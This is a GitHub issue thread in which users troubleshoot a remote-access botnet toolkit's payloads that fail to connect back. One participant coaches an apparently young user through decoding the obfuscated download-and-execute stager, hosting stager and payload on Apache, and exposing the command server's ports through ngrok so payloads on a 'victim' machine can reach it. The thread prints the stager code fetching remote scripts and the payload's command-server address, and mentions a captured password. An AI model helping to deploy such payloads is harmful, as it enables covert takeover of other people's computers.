### ISSUE TITLE
Connection refused error, edit3: ngrok connection? 

### ISSUE THREAD

**Issue by debian-user-france1** [malwaredllc/byob#302] opened 2020-10-16 07:42 UTC
Traceback (most recent call last):
  File "urllib/request.py", line 1317, in do_open
  File "http/client.py", line 1252, in request
  File "http/client.py", line 1298, in _send_request
  File "http/client.py", line 1247, in endheaders
  File "http/client.py", line 1026, in _send_output
  File "http/client.py", line 966, in send
  File "http/client.py", line 938, in connect
  File "socket.py", line 727, in create_connection
  File "socket.py", line 716, in create_connection
ConnectionRefusedError: [Errno 111] Connection refused

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "byob_nix_amd64_a5A.py", line 5, in <module>
  File "<string>", line 1, in <module>
  File "urllib/request.py", line 222, in urlopen
  File "urllib/request.py", line 525, in open
  File "urllib/request.py", line 543, in _open
  File "urllib/request.py", line 503, in _call_chain
  File "urllib/request.py", line 1345, in http_open
  File "urllib/request.py", line 1319, in do_open
urllib.error.URLError: <urlopen error [Errno 111] Connection refused>
[14900] Failed to execute script byob_nix_amd64_a5A

The payload is not on my OWN and not on my VICTIMS computer running. I tried Linux executable (first it cant create linux executable, later worked) and Python on Windows 10 and Ubuntu20.04. No error message in output from Server.
Need I to allow a special port? ssh is working with 0.0.0.0:22 and 127.0.0.1:22.

  File "socket.py", line 727, in create_connection
  File "socket.py", line 716, in create_connection
ConnectionRefusedError: [Errno 111] Connection refused
I think here was the "Bug" from the Script.  Or have I to edit the script?

import sys,zlib,base64,marshal,json,urllib
if sys.version_info[0] > 2:
    from urllib import request
urlopen = urllib.request.urlopen if sys.version_info[0] > 2 else urllib.urlopen      #Here is maybe the error
exec(eval(marshal.loads(zlib.decompress(base64.b64decode(b'eJwrtWRgYCgtyskvSM3TUM8oKSmw0tc3NtQzNNAzNDXWM7AyNDa20NcvLklMTy0q1i/3dtErqFTX1CtKTUzR0AQAHWIRig==')))))

Please help me. I saw many closed issues with this error.  Maybe I forgot to install something on the Server.

**Comment by ricko2991** [comment] 2020-10-16 16:05
Just decode your python payload. And you will be see the contents of the code. This is encrypted by marshal. search for articles how to decrypt code hidden by marshal and base64

**Comment by debian-user-france1** [comment] 2020-10-16 16:10
Hmmm...   I'll try it later... Thanks for the tip...

**Comment by debian-user-france1** [comment] 2020-10-16 16:32
Something like this?

https://github.com/topics/decrypt-marshal

**Comment by ricko2991** [comment] 2020-10-16 16:48
and let's see what's in the code. I haven't gotten this far because I rarely use web-gui and only use byob when generating payloads.

**Comment by debian-user-france1** [comment] 2020-10-16 16:54
I'm using web interface too and I generate payloads from the web interface. Youtuber Network Chuck using web interface. I some little problems installing this, but now is still working.  Only payloads are not working...

**Comment by ricko2991** [comment] 2020-10-16 16:55
maybe you can discuss with @drnhzn, because he can get a connection from the payload he made.

**Comment by debian-user-france1** [comment] 2020-10-16 19:53
I will close the comment if I fixed it

**Comment by Jarnek** [comment] 2020-10-18 19:46
It works for me when i replace the server ip in client.py with either "127.0.0.1" or the local address from my pc. Mabe we should add a selection method to the payload web interface?

**Comment by debian-user-france1** [comment] 2020-10-23 17:15
I changed it in the web gui to my home network ip adress, port is 5000 (default).
I can't access from a windows "tablet-pc, acer" to my computer (both are not working, exe and python, error: connection refused)
I tried this in the Terminal.  The web-gui is not working too, but another connection refused error

**Comment by debian-user-france1** [comment] 2020-10-23 17:16
What do u mean with this??:

It works for me when i replace the server ip in client.py with either "127.0.0.1" or the local address from my pc. Mabe we should add a selection method to the payload web interface?

**Comment by ricko2991** [comment] 2020-10-23 21:50
If you fail on web-gui, try to port forwading on your router and open port 1337, 1338, 1339, 5000, and 8080

**Comment by debian-user-france1** [comment] 2020-10-24 17:10
I can't change any settings on "my" UPC Router...
UPC have no settings, you can't do anything on the page of (192.168.0.1), you only see the devices that are connected and you can't kick they...

**Comment by debian-user-france1** [comment] 2020-10-24 17:11
But you can change the IP address in the run.py script

**Comment by ricko2991** [comment] 2020-10-24 17:23
can you make a python payload and run it on terminal?
Send the screenshot

**Comment by debian-user-france1** [comment] 2020-10-24 17:36
can you send me the command???
Oh, can I use python??   #My Windows-Tablet-PC have so many times bluescreens in order of the memory management.
Sorry if I'm like five days not online because I have to go to school now.  no Holidays.....  -_-  
so... like I start the server on port 192.168.0.199 with port 80, right? or 5000? tell me please...
than client.py 192.168.0.81 80 --freeze --name (name)
and run it on the comuter (victim)

**Comment by ricko2991** [comment] 2020-10-24 17:39
client.py 192.168.0.81 1111 --name myapp.py

**Comment by ricko2991** [comment] 2020-10-24 17:45
Your ip is 192.168.0.81 right?

**Comment by debian-user-france1** [comment] 2020-10-25 08:18
My IP is 192.168.0.199 and.. so... I never tried 1111, only 80 and 5000. I didn't remote connected my payload on port 80, but I can still try it after.    I'm using IDLE for my python script........

**Comment by ricko2991** [comment] 2020-10-25 13:41
it's up to you which port to choose, as long as it's not running. Maybe the port you are using is refused because it is being used by another program

**Comment by debian-user-france1** [comment] 2020-10-26 05:49
Oh!     I forgot that.........
I try 80, 21, 22, 1111, 2500 and I'll tell you if it works.
Thanks...

**Comment by debian-user-france1** [comment] 2020-11-08 13:23
It won't work, 80 would surely work, but.. no

**Comment by ricko2991** [comment] 2020-11-09 00:56
Try another port like 1111, 2222, 3333, 4444, etc....

**Comment by debian-user-france1** [comment] 2020-11-10 12:02
I'm recording something......
I think about sharing about onedrive....

**Comment by debian-user-france1** [comment] 2020-11-10 12:38
will share later...

**Comment by debian-user-france1** [comment] 2020-11-10 15:10
![web-gui-refused-byob](https://user-images.githubusercontent.com/72965843/98692246-31df6c80-236f-11eb-8ca4-f92b20086957.png)

**Comment by debian-user-france1** [comment] 2020-11-10 15:11
I can connect in the browser, so I think - might be an error in the payload generator script or an error in server...
It maybe works if you start the server, but only use client.py...  and then take a look to the web-gui
I try this...

**Comment by ricko2991** [comment] 2020-11-11 02:10
So, it actually works right on byob(cli)? So now the problem here is that you can't use some modules properly. So try going to the `byob/byob /modules` folder. There you will find several modules that can be used. If you understand python you will know how to use the modules just by seeing what is needed if you want to run a module such as portscanner.
example:
portscanner 192.168.1.2 <== victim computer

**Comment by ricko2991** [comment] 2020-11-11 02:16
if you are on a web-gui, you just need to do port forwarding on the router, by opening the port that you will use.
Of course you allow it for the server/attacker

**Comment by debian-user-france1** [comment] 2020-11-11 06:03
Oh, thanks for these Tipps...
I didn't used ngrok, but sure, I will understand that...   I may have problems with decoding the payload...
I'll search something on GitHub
Or I use it from the browser, I think it is not encryptet, you can see it in Video

**Comment by debian-user-france1** [comment] 2020-11-11 14:31
ngrok isn't for kali linux
how to install? 
sudo apt install ngrok?  or from github etc?
I would like to use it with kali linux...
but if it's not working... so, yes.. I have to use ubuntu

**Comment by debian-user-france1** [comment] 2020-11-11 14:40
It is avaible for snap, snap isn't avaible for kali linux...
I installed it on ubuntu now, but isn't the payload generator automaticaly setting the right IP and port?

**Comment by debian-user-france1** [comment] 2020-11-11 14:45
yey, sign in with github.. 
I think i won't pay for that, but...

**Comment by debian-user-france1** [comment] 2020-11-11 14:50
not working, **I DIDN'T EDITED THE PAYLOAD**

Traceback (most recent call last):
  File "/usr/lib/python3.8/urllib/request.py", line 1350, in do_open
    h.request(req.get_method(), req.selector, req.data, headers,
  File "/usr/lib/python3.8/http/client.py", line 1255, in request
    self._send_request(method, url, body, headers, encode_chunked)
  File "/usr/lib/python3.8/http/client.py", line 1301, in _send_request
    self.endheaders(body, encode_chunked=encode_chunked)
  File "/usr/lib/python3.8/http/client.py", line 1250, in endheaders
    self._send_output(message_body, encode_chunked=encode_chunked)
  File "/usr/lib/python3.8/http/client.py", line 1010, in _send_output
    self.send(msg)
  File "/usr/lib/python3.8/http/client.py", line 950, in send
    self.connect()
  File "/usr/lib/python3.8/http/client.py", line 921, in connect
    self.sock = self._create_connection(
  File "/usr/lib/python3.8/socket.py", line 808, in create_connection
    raise err
  File "/usr/lib/python3.8/socket.py", line 796, in create_connection
    sock.connect(sa)
ConnectionRefusedError: [Errno 111] Connection refused

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "byob_ruM.py", line 5, in <module>
    exec(eval(marshal.loads(zlib.decompress(base64.b64decode(b'eJwrtWJgYCgtyskvSM3TUM8oKSmw0tc3NtQzNNAzNDXWMzG0MjQ2ttDXLy5JTE8tKtYvKvXVK6hU19QrSk1M0dAEAC74Ee4=')))))
  File "<string>", line 1, in <module>
  File "/usr/lib/python3.8/urllib/request.py", line 222, in urlopen
    return opener.open(url, data, timeout)
  File "/usr/lib/python3.8/urllib/request.py", line 525, in open
    response = self._open(req, data)
  File "/usr/lib/python3.8/urllib/request.py", line 542, in _open
    result = self._call_chain(self.handle_open, protocol, protocol +
  File "/usr/lib/python3.8/urllib/request.py", line 502, in _call_chain
    result = func(*args)
  File "/usr/lib/python3.8/urllib/request.py", line 1379, in http_open
    return self.do_open(http.client.HTTPConnection, req)
  File "/usr/lib/python3.8/urllib/request.py", line 1353, in do_open
    raise URLError(err)
urllib.error.URLError: <urlopen error [Errno 111] Connection refused>

**Comment by debian-user-france1** [comment] 2020-11-11 14:52
can you help me with unmarshalling/decoding OR send a payload an I can edit and try if it works..

**Comment by debian-user-france1** [comment] 2020-11-11 17:25
I have to pay to ngrok for using a special port, right?
they have this: 172.0.0.1:4040, I want 1111, I don't pay them, thats not a very nice website and iI havn't enought money for something like that...

**Comment by debian-user-france1** [comment] 2020-11-11 17:26
Adresse nicht erkannt

Firefox weiß nicht, wie diese Adresse geöffnet werden soll, da eines der folgenden (tcp) kein registriertes Protokoll oder in diesem Kontext nicht erlaubt ist.

    Eventuell müssen Sie andere Software installieren, um diese Adresse aufrufen zu können.

translate.google.com, german

**Comment by debian-user-france1** [comment] 2020-11-11 17:28
tcp://4.tcp.ngrok.io:12465

**Comment by debian-user-france1** [comment] 2020-11-11 17:29
Can I use web interface in home network?

**Comment by debian-user-france1** [comment] 2020-11-11 17:32
ngrok by @inconshreveable                                      (Ctrl+C to quit)
                                                                               
Session Status                online                                           
Account                       france1 (Plan: Free)                             
Version                       2.3.35                                           
Region                        United States (us)                               
Web Interface                 http://127.0.0.1:4040                            
Forwarding                    tcp://4.tcp.ngrok.io:12465 -> localhost:1111     #It is using  the right port... Web Interface not w.
                                                                               
Connections                   ttl     opn     rt1     rt5     p50     p90      
                              0       0       0.00    0.00    0.00    0.00

**Comment by debian-user-france1** [comment] 2020-11-11 17:32
No requests to display yet
To get started, make a request to one of your tunnel URLs

    tcp://4.tcp.ngrok.io:12465

**Comment by ricko2991** [comment] 2020-11-13 05:13
Hey, can you replace `exec` to `print` from myapp.py. open in text editor

**Comment by debian-user-france1** [comment] 2020-11-13 06:37
import sys,zlib,base64,marshal,json,urllib

print(eval(marshal.loads(zlib.decompress(base64.b64decode(b'eJwrtWJgYCgtyskvSM3TUM8oKSmw0tc3NtQzNNAzNDXWMzG0MjQ2ttDXLy5JTE8tKtYvKvXVK6hU19QrSk1M0dAEAC74Ee4=')))))
???????

================================================================== RESTART: /home/france1/Downloads/byob_ruM.py =================================================================
Traceback (most recent call last):
  File "/home/france1/Downloads/byob_ruM.py", line 3, in <module>
    print(eval(marshal.loads(zlib.decompress(base64.b64decode(b'eJwrtWJgYCgtyskvSM3TUM8oKSmw0tc3NtQzNNAzNDXWMzG0MjQ2ttDXLy5JTE8tKtYvKvXVK6hU19QrSk1M0dAEAC74Ee4=')))))
  File "<string>", line 1, in <module>
NameError: name 'urlopen' is not defined
>>>

**Comment by debian-user-france1** [comment] 2020-11-13 06:44
it isn't printing, it is executing...
you removed this:
if sys.version_info[0] > 2:
    from urllib import request
urlopen = urllib.request.urlopen if sys.version_info[0] > 2 else urllib.urlopen
right?
I tried with and wothiut, but it says like, line 1000 is occured an error, so it exect it and not printed it

**Comment by debian-user-france1** [comment] 2020-11-13 06:48
I may calculate this back in programming language C, but... im C-beginner and I don't know... If this works

**Comment by ricko2991** [comment] 2020-11-13 08:35
That strange, wait i want to try it again.

**Comment by ricko2991** [comment] 2020-11-13 08:59
Ok. Thats my bad. Remove eval too and 1 brackets from the last. Try to run this:
print(marshal.loads(zlib.decompress(base64.b64decode(b'eJwrtWJgYCgtyskvSM3TUM8oKSmw0tc3NtQzNNAzNDXWMzG0MjQ2ttDXLy5JTE8tKtYvKvXVK6hU19QrSk1M0dAEAC74Ee4='))))

**Comment by debian-user-france1** [comment] 2020-11-13 11:31
![tmp-screenshot](https://user-images.githubusercontent.com/72965843/99068076-20cf6f00-25ac-11eb-9f4d-be3b7d4812bf.png)

**Comment by debian-user-france1** [comment] 2020-11-13 11:32
But, that isn't the whole script..

**Comment by debian-user-france1** [comment] 2020-11-13 11:35
OH!!!! It is taking the script from the server, so maybe is the script on the server wrong (I think...) or it couldn't take the script from the server (why error like line 500 and 1000?)

**Comment by debian-user-france1** [comment] 2020-11-13 11:39
france1@ubuntu-desktop:~/Downloads$ python byob_ruM.py 
Traceback (most recent call last):
  File "byob_ruM.py", line 5, in <module>
    urlopen('http://192.168.0.199:1111//stagers/ruM.py').read()
  File "/usr/lib/python3.8/urllib/request.py", line 222, in urlopen
    return opener.open(url, data, timeout)
  File "/usr/lib/python3.8/urllib/request.py", line 531, in open
    response = meth(req, response)
  File "/usr/lib/python3.8/urllib/request.py", line 640, in http_response
    response = self.parent.error(
  File "/usr/lib/python3.8/urllib/request.py", line 569, in error
    return self._call_chain(*args)
  File "/usr/lib/python3.8/urllib/request.py", line 502, in _call_chain
    result = func(*args)
  File "/usr/lib/python3.8/urllib/request.py", line 649, in http_error_default
    raise HTTPError(req.full_url, code, msg, hdrs, fp)
urllib.error.HTTPError: HTTP Error 404: NOT FOUND
france1@ubuntu-desktop:~/Downloads$ emacs byob_ruM.py 
france1@ubuntu-desktop:~/Downloads$ python byob_ruM.py 
Traceback (most recent call last):
  File "byob_ruM.py", line 5, in <module>
    urlopen('192.168.0.199:1111//stagers/ruM.py').read()
  File "/usr/lib/python3.8/urllib/request.py", line 222, in urlopen
    return opener.open(url, data, timeout)
  File "/usr/lib/python3.8/urllib/request.py", line 525, in open
    response = self._open(req, data)
  File "/usr/lib/python3.8/urllib/request.py", line 547, in _open
    return self._call_chain(self.handle_open, 'unknown',
  File "/usr/lib/python3.8/urllib/request.py", line 502, in _call_chain
    result = func(*args)
  File "/usr/lib/python3.8/urllib/request.py", line 1421, in unknown_open
    raise URLError('unknown url type: %s' % type)
urllib.error.URLError: <urlopen error unknown url type: 192.168.0.199>

**Comment by debian-user-france1** [comment] 2020-11-13 11:52
tcp isn't working too.. and http isn't found, I tried wothout and with ngrok... I didn't restartet the server, i'm trying now... with restartet... not working... server isn't hostet, only ngrok is running... maybe if I set on run.py localhost:1111..
how to set up this?  It says no tunnel request on homepage http://127.0.0.1:4040, but thats local... and tcp isn't working... I need http://

**Comment by debian-user-france1** [comment] 2020-11-13 11:54
192.168.0.199 - - [13/Nov/2020 12:53:51] "GET /api/session/poll HTTP/1.1" 200 -
every time this message, but I think, it needs 127.0.0.1, thats localhost... right? and 0.0.0.0 uses every IP..

**Comment by debian-user-france1** [comment] 2020-11-13 11:57
OMG!!! http:*.tcp.ngrok.io:***** is working, I'm dumb, stuped

**Comment by debian-user-france1** [comment] 2020-11-13 12:02
error 404
oh...
Traceback (most recent call last):
  File "byob_eYH.py", line 5, in <module>
    urlopen('http://0.tcp.ngrok.io:12691//stagers/eYH.py').read()
  File "/usr/lib/python3.8/urllib/request.py", line 222, in urlopen
    return opener.open(url, data, timeout)
  File "/usr/lib/python3.8/urllib/request.py", line 531, in open
    response = meth(req, response)
  File "/usr/lib/python3.8/urllib/request.py", line 640, in http_response
    response = self.parent.error(
  File "/usr/lib/python3.8/urllib/request.py", line 569, in error
    return self._call_chain(*args)
  File "/usr/lib/python3.8/urllib/request.py", line 502, in _call_chain
    result = func(*args)
  File "/usr/lib/python3.8/urllib/request.py", line 649, in http_error_default
    raise HTTPError(req.full_url, code, msg, hdrs, fp)
urllib.error.HTTPError: HTTP Error 404: NOT FOUND
 

not found on page...

**Comment by debian-user-france1** [comment] 2020-11-13 12:02
don't hack me

**Comment by debian-user-france1** [comment] 2020-11-13 12:31
where should be the right link???

**Comment by ricko2991** [comment] 2020-11-13 12:42
No, do it like this:
Don't close or logout on your web gui 
1. run ngrok to `ngrok http 1338`
2. Paste the http link on web browser. You will see all the payload option starting from all modules and other options
3. There is the Stager folder and payload folder you can edit by copying to apache2
4. Do it, and send me the screenshot

**Comment by ricko2991** [comment] 2020-11-13 12:49
Do you use router? because it easy if you use router. Just do port forwading by open the port that will be use for listener

**Comment by debian-user-france1** [comment] 2020-11-13 14:56
https://community.upc.ch/t5/Internet/Connect-Box-Port-forwarding-Port-Weiterleitung/td-p/143711?attachment-id=2030

It is not working for my router, I don't have much options and my parents won't buy a better. I sayd, you have to buy like fritz!box for a more stable internet, they: no, we won't change the don't-know-how-to-say. They are... angry about the most slow Internet, but... sometimes we have 500 kb/s, sometimes 30MB/s, on speedtest every time with the new abo - we got one better for "free" 600 MB/s download and 60 upload, before the new abo the halve. So I have to use something to.. go around the Router

**Comment by debian-user-france1** [comment] 2020-11-13 15:18
nothing here... I created MUCH payloads bevore, but nothing is here, in exfiltrated files

![tmp-screenshot](https://user-images.githubusercontent.com/72965843/99088028-c0502a00-25cb-11eb-8e92-fc693db2dfa3.png)

**Comment by ricko2991** [comment] 2020-11-13 15:25
I'm school bro, I just like to share my knowledge with others. 
Please port forwading use ngrok if you don't have router.
Your port on payload is 1338
Open the port on ngrok
`ngrok http 1338`

**Comment by debian-user-france1** [comment] 2020-11-13 15:26
hello  :D

**Comment by ricko2991** [comment] 2020-11-13 15:28
I want to make tutorial but i'm busy with school homework

**Comment by debian-user-france1** [comment] 2020-11-13 15:31
you have same? I'm in 6th class, and I wan't to go to ...
so we have gimi(gym or something in eng) and sek A, sek B & C. I wan't to go to sek A, this is normal school length, (gym is long term or normal, gymnasium) and.. we have BILLIONS of tests.. strong

**Comment by ricko2991** [comment] 2020-11-13 15:35
Ok. have you done it the steps above? did you manage to run it on ngrok?

**Comment by debian-user-france1** [comment] 2020-11-13 15:35
hacking, lol
I already had ONE password
![pwnagotchi_upolading-stanev](https://user-images.githubusercontent.com/72965843/99089933-38b7ea80-25ce-11eb-8024-f516b83ad1b0.png)

**Comment by debian-user-france1** [comment] 2020-11-13 15:35
yes, I does, here:

![tmp-screenshot](https://user-images.githubusercontent.com/72965843/99089954-466d7000-25ce-11eb-8681-2cea45365479.png)

**Comment by debian-user-france1** [comment] 2020-11-13 15:37
how to copy to apache2?
like... what actually do you mean?

**Comment by ricko2991** [comment] 2020-11-13 15:37
Copy your stager & payload to send into target in text editor

**Comment by debian-user-france1** [comment] 2020-11-13 15:40
import sys,zlib,base64,marshal,json,urllib
if sys.version_info[0] > 2:
    from urllib import request
urlopen = urllib.request.urlopen if sys.version_info[0] > 2 else urllib.urlopen
urlopen('https://keep-privacy.ngrok.io/stagers/eYH.py').read()

**Comment by debian-user-france1** [comment] 2020-11-13 15:47
yes, I does it...
is on idle now

**Comment by ricko2991** [comment] 2020-11-13 15:48
Apache2 is your web server. Make new file on /var/www/html

**Comment by debian-user-france1** [comment] 2020-11-13 15:49
ok...

**Comment by debian-user-france1** [comment] 2020-11-13 15:49
I have to go sure if apache is running after...

**Comment by ricko2991** [comment] 2020-11-13 15:49
> how to copy to apache2?
> like... what actually do you mean?

Apache2 is your web server. Make new file on /var/www/html

**Comment by debian-user-france1** [comment] 2020-11-13 15:50
no /var/www in idle visuble

**Comment by ricko2991** [comment] 2020-11-13 15:51
Can you screen shot your last line from your python payload and your stager?

Ther was two you must download from the link before. There was on stager folder and payload folder

**Comment by ricko2991** [comment] 2020-11-13 15:52
> no /var/www in idle visible
> not visible in root
> downloading apache2...

Sudo apt-get install apache2

Sudo service apache2 restart

**Comment by debian-user-france1** [comment] 2020-11-13 15:53
I have the payload.. I think I have... I downloaded already from the payload-page on 192.168.0.199:1111/payloads

**Comment by debian-user-france1** [comment] 2020-11-13 15:54
root@ubuntu-desktop:/home/france1# cp -r eYH.py /var/www/html/eYH.py

**Comment by debian-user-france1** [comment] 2020-11-13 15:55
> Can you screen shot your last line from your python payload and your stager?
> 
> Ther was two you must download from the link before. There was on stager folder and payload folder

_run = run(url='http://31.10.**.**:1338//payloads/eYH.py')

**Comment by debian-user-france1** [comment] 2020-11-13 15:56
do you need whole address of ngrok.io?

**Comment by debian-user-france1** [comment] 2020-11-13 15:57
OH! I donwloaded payload now

**Comment by debian-user-france1** [comment] 2020-11-13 15:58
ls /var/www/html/
eYH-payload.py  eYH.py  index.html

**Comment by ricko2991** [comment] 2020-11-13 16:01
open http in the ngrok that you have ported before. and add payload into eg: http:// ngrokdomain/payload 
copy the payload you have into apache2 too

**Comment by ricko2991** [comment] 2020-11-13 16:02
> ls /var/www/html/
> eYH-payload.py eYH.py index.html
> do I need to change the IP address on payload ans stager?

Download the python payload from the payload too. Not just stager. You must have both

**Comment by debian-user-france1** [comment] 2020-11-13 16:03
see (ls) eHY is stager and eHY-payload is payload

**Comment by ricko2991** [comment] 2020-11-13 16:05
Ok. How did you download ngrok before?

**Comment by debian-user-france1** [comment] 2020-11-13 16:07
ngrok?
sudo snap install ngrok

**Comment by ricko2991** [comment] 2020-11-13 16:09
ok. Do the following command :
cd 
nano .ngrok2/ngrok.yml

**Comment by debian-user-france1** [comment] 2020-11-13 16:10
yes, it shows authoken

**Comment by ricko2991** [comment] 2020-11-13 16:12
Create tunnel on new line:
tunnels:
   first-tunnel:
         addr: 80
         proto: http
   second-tunnel:
         addr: 1338
         proto: tcp

Save it. And run `ngrok start --all`

**Comment by debian-user-france1** [comment] 2020-11-13 16:14
authtoken: ...

tunnels:
first-tunnel:
addr: 80
proto: http
second-tunnel:
addr: 1338
proto: tcp

?

**Comment by debian-user-france1** [comment] 2020-11-13 16:15
ERROR:  Your configuration file must define at least one tunnel when using --all. To intentionally start no tunnels, use `ngrok start --none.`

**Comment by ricko2991** [comment] 2020-11-13 16:15
Create like this:
https://youtu.be/EciDB0lKk5Q

**Comment by debian-user-france1** [comment] 2020-11-13 16:20
yes, I does

**Comment by debian-user-france1** [comment] 2020-11-13 16:20
is running now

**Comment by ricko2991** [comment] 2020-11-13 16:22
Ok. Can you screen shot the content of the last line of your payload and stager?. There you will be see the ip and the port.

**Comment by debian-user-france1** [comment] 2020-11-13 16:25
Web Interface                 http://127.0.0.1:4040                               
Forwarding                    tcp://2.tcp.ngrok.io:15113 -> localhost:1338        
Forwarding                    http://f171938947db.ngrok.io -> http://localhost:80 
Forwarding                    https://f171938947db.ngrok.io -> http://localhost:80

**Comment by ricko2991** [comment] 2020-11-13 16:27
Your payload and your stager not your ngrok. Screen shot ths last line. Opem in text editor

**Comment by debian-user-france1** [comment] 2020-11-13 16:29
ok
payload:
if __name__ == '__main__':
    _payload = Payload(host='31.10.153.41', port='1337', gui='1', owner='france1')
    _payload.run()
stager:

if __name__ == '__main__':
    _run = run(url='http://31.10.153.41:1338//payloads/eYH.py')

**Comment by debian-user-france1** [comment] 2020-11-13 16:30
![tmp-screenshot](https://user-images.githubusercontent.com/72965843/99095826-e8dd2180-25d5-11eb-9be4-ead93014cf0a.png)

**Comment by debian-user-france1** [comment] 2020-11-13 16:31
bya, its 17:30 (5:30 pm) by us

**Comment by ricko2991** [comment] 2020-11-14 11:45
Hey bro, i do some test before use my kali machine, and i use ngrok, i try to get the connection over tcp but i fail with error token, So I don't know what should i do to solve the problem. you can try it if you corious by replace the ngrok host you made to open the port 1337. But if you want to connect automactly and not to change all setting on payload and stager, you can use router by open port 1337 and 1338.

You can close this issue because the problem is only your host and port is not route so it can't be access. You can use port forwading method use your router and ngrok, but as i say, i use ngrok and i fail.

**Comment by debian-user-france1** [comment] 2020-11-14 19:19
Maybe... I didn't fail with Kali Linux. You can use Ubuntu... More stable and nvidia driver availed for example. Kali Linux requires much time for most things. But... yes, if you say should close... I can edit it.- My router don't support it, UPC is very bad... They post a guide, but I think we have to pay more to get better router... My Discord:
france1#4929, I like nice friends... Now:
Would you take time to help me and I edit the issue or wouldn't you take time etc. and say we have to close the issue?
You can choose... Maybe I can do it by self, but why apache2 server? Not edit payload and copy to vctim with different ip addresses?


Would you take time to help me and I edit the issue or wouldn't you take time on this issue and say we have to close the issue?
You can choose... I think I have something good to you, but I can't do much...

**Comment by debian-user-france1** [comment] 2020-11-14 19:21
Remember discord if you want... Only if you want... And if you have...
france1#4929, Minecraft: Caramello5839 (Java, I have windows 10 edition too)

**Comment by debian-user-france1** [comment] 2020-11-14 19:25
Oh! Bro, I also have problems with Linux and windows exec... But... Not in this issue and not now.

**Comment by debian-user-france1** [comment] 2020-11-16 17:43
did you unsubscribed? please answer...

**Comment by debian-user-france1** [comment] 2020-11-17 19:07
Sad...

**Comment by debian-user-france1** [comment] 2020-11-21 19:01
I close this issue within a few days
Please answer if not close:)

**Comment by ricko2991** [comment] 2020-11-22 15:38
Hello @debian-user-france1 i'm not answer your question because i'm busy for a few weeks. Ok. I know your problem in linux so much and you may have a lot of difficulty to getting over it. But this repository provides discord groups. You can join and find some people who are already proficient in networking, linux, and so on. Sorry, I can't help you much because I have to focus on school. Have a nice day🙋

**Comment by debian-user-france1** [comment] 2020-11-22 16:53
Nice if we are friends in Discord...
I know, school is hard :D 
You can say me, if I should close the issue, if you have time
No stress:)

**Comment by debian-user-france1** [comment] 2021-01-23 16:30
@ricko2991 

Hello after long time
I have now port forwarding. Using a raspberry pi. My grandfather was nice and allows it

**Comment by debian-user-france1** [comment] 2021-03-27 10:04
no stale

**Comment by debian-user-france1** [comment] 2021-03-27 10:05
How can I do with ngrok??

**Comment by malwaredllc** [comment] 2021-03-27 16:17
ngrok isn't supported sorry

**Closed by malwaredllc** 2021-03-27 16:17 UTC
Labels: no-issue-activity
